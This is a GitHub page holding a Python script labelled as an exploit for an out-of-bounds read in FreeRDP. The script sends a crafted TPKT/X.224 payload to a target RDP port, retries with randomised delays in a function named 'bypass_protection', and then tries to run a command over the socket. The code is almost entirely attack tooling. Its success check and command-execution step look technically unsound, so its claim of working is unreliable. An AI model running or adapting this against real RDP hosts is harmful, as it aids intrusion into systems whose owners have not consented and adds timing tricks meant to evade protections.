-
Notifications
You must be signed in to change notification settings - Fork 6
/
FreeRDP - Out-of-Bounds Read.py
105 lines (85 loc) · 3.16 KB
/
FreeRDP - Out-of-Bounds Read.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
import socket
import struct
import time
import random
def create_rdp_connection(ip, port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
return sock
except Exception as e:
print(f"Error creating connection: {e}")
return None
def send_exploit(sock, payload):
try:
# Building TPKT Header
tpkt_header = struct.pack("!BBH", 3, 0, len(payload) + 4)
# Building X.224 Header
x224_header = b'\x02\xf0\x80' + struct.pack("!H", len(payload) + 2)
# Message assembly
exploit_data = tpkt_header + x224_header + payload
# Sending data
sock.send(exploit_data)
response = sock.recv(1024)
print(f"Received: {response}")
return response
except socket.error as e:
print(f"Socket error sending exploit: {e}")
return None
except Exception as e:
print(f"Error sending exploit: {e}")
return None
def exploit_successful(response):
# Check the response to determine if the exploit was successful
if response and b"\x03\x00" in response:
return True
return False
def execute_command(sock, command):
try:
# Execute Random Commands
command_payload = command.encode('utf-8')
sock.send(command_payload)
response = sock.recv(1024)
print(f"Command response: {response}")
except socket.error as e:
print(f"Socket error executing command: {e}")
except Exception as e:
print(f"Error executing command: {e}")
def reset_connection(sock, ip, port):
try:
sock.close()
except:
pass
time.sleep(random.uniform(1, 3))
return create_rdp_connection(ip, port)
def bypass_protection(ip, port, payload, retries=5, delay_range=(1, 5)):
for attempt in range(retries):
print(f"Attempt {attempt + 1}/{retries}")
sock = create_rdp_connection(ip, port)
if not sock:
continue
# Change the timing of package delivery
time.sleep(random.uniform(0.1, 1.0))
# Exploitation submission
response = send_exploit(sock, payload)
if response and exploit_successful(response):
return sock, response
else:
print("Exploit attempt failed. Retrying...")
sock = reset_connection(sock, ip, port)
time.sleep(random.uniform(*delay_range)) # Random delay between attempts
return None, None
def main():
target_ip = "192.168.1.100" # Replace this with the target IP address
target_port = 3389 # Default port for RDP
payload = b'\x03\x00\x01\x0b\x06\xd0\x00\x00\x12\x34\x00\x02\x01\x00\x08\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
sock, response = bypass_protection(target_ip, target_port, payload)
if sock and response:
print("Exploit successful!")
# Execute random orders after successful exploitation
execute_command(sock, "echo Hello from exploit")
sock.close()
else:
print("Exploit failed after multiple attempts.")
if __name__ == "__main__":
main()